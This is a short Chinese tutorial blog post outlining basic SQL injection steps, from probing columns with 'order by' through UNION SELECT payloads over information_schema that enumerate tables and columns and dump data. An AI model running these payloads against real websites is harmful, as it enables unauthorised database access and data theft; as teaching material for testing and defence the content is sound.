首页 > 数据库 >简单sql注入思路

简单sql注入思路

时间:2022-12-31 13:11:25浏览次数:40  
标签:... group 数据库 sql 表名 思路 id concat 注入

1.判断注入点 猜解列名数量
.... ?id=1 order by x  (x为数字)

2.报错猜解
...?id=-1 selecet 1,2,..,x

3.信息收集
数据库版本:version()
数据库名字:database()
数据库用户:user()
操作系统:@@version_compile_os

4.查询指定数据库名下的表名信息
...?id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='数据库名'

5.查询指定表名的列名信息
...?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='表名'

6.查询数据
...?id=-1 union select 1,group_concat(列名),group_concat(列名),4 from 表名

标签:...,group,数据库,sql,表名,思路,id,concat,注入
From: https://www.cnblogs.com/juejuezi/p/17016470.html

相关文章

  • sql根据团队树一级一级汇总统计
    ​ 1、需求描述    最近碰到了一个需求,是要统计各个团队的员工的销售金额,然后一级一级向上汇总。​编辑 架构团队树是类似于这种样子的,需要先算出每个员工的......
  • Centos安装Mysql
    Centos安装MysqlCentos通过下载安装包方式进行安装Mysql,Centos版本7.9,Mysql版本8.0.31#查看Centos版本cat/etc/redhat-release#查看mysql版本mysql--versionmysq......
  • MySQL密码策略审计,提升安全
    背景:审核密码是否符合规范,如大小写、数字、特殊字符等安装插件:1、在线启动INSTALLPLUGINvalidate_passwordSONAME'validate_password.so';2、写入配置文件plugi......
  • 认真学习MySQL中锁机制(二)
    接上文​​认真学习MySQL中锁机制(一)​​我们继续学习MySQL中的锁机制。【5】按加锁的方式划分:显示锁、隐式锁①隐式锁一个事务在执行insert操作时,如果即将插入的间隙已经被......
  • SQLAlchemy连接MySQL及记录的查询、更新、删除、多表关联查询
    SQLAlchemy是Python的ORM库,支持多种数据库。建立连接连接MySQL要用到​​Engine​​,Engine集成了连接池pool和方言Dialect(支持不通数据库的SQL语法),最后都统一成标准DBAPI。f......
  • Docker运行mysql
    1、拉取mysql5.7镜像dockerpullmysql:5.72、创建用于挂载的目录(日志目录、数据目录、配置目录) 3、在conf目录下创建my.cnf配置文件my.cnf内容如下:[mysqld]......
  • lightdb/postgresql中的表空间及相关注意点
    一般来说,现在为了各司其职,都把硬盘做成了san,raid,至少lvm。但是仍然有一些用户希望可以指定表空间和索引,当然也包括冷热数据。在lightdb里面也支持该特性。如下:lightdb@p......
  • MySQL报错解决
    1mysql报错解决mysql>grantallon*.*to"dba"@"%"identifiedby"mysql123";ERROR1819(HY000):Yourpassworddoesnotsatisfythecurrentpolicyrequirement......
  • HiveSQL——打折日期交叉问题
    需求描述如下为平台商品促销数据:字段为品牌,打折开始日期,打折结束日期createtabletemp_date_link(brand_idvarchar(10),start_datestring,end_dat......
  • MySQL slave upgrade: Slave failed to initialize relay log info structure from th
    MySQL slaveafterupgradefrom 5.6.x to 5.7.x maythrowthefollowingerror:12mysql>STARTSLAVE;ERROR1872(HY000):Slavefailedtoinitiali......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99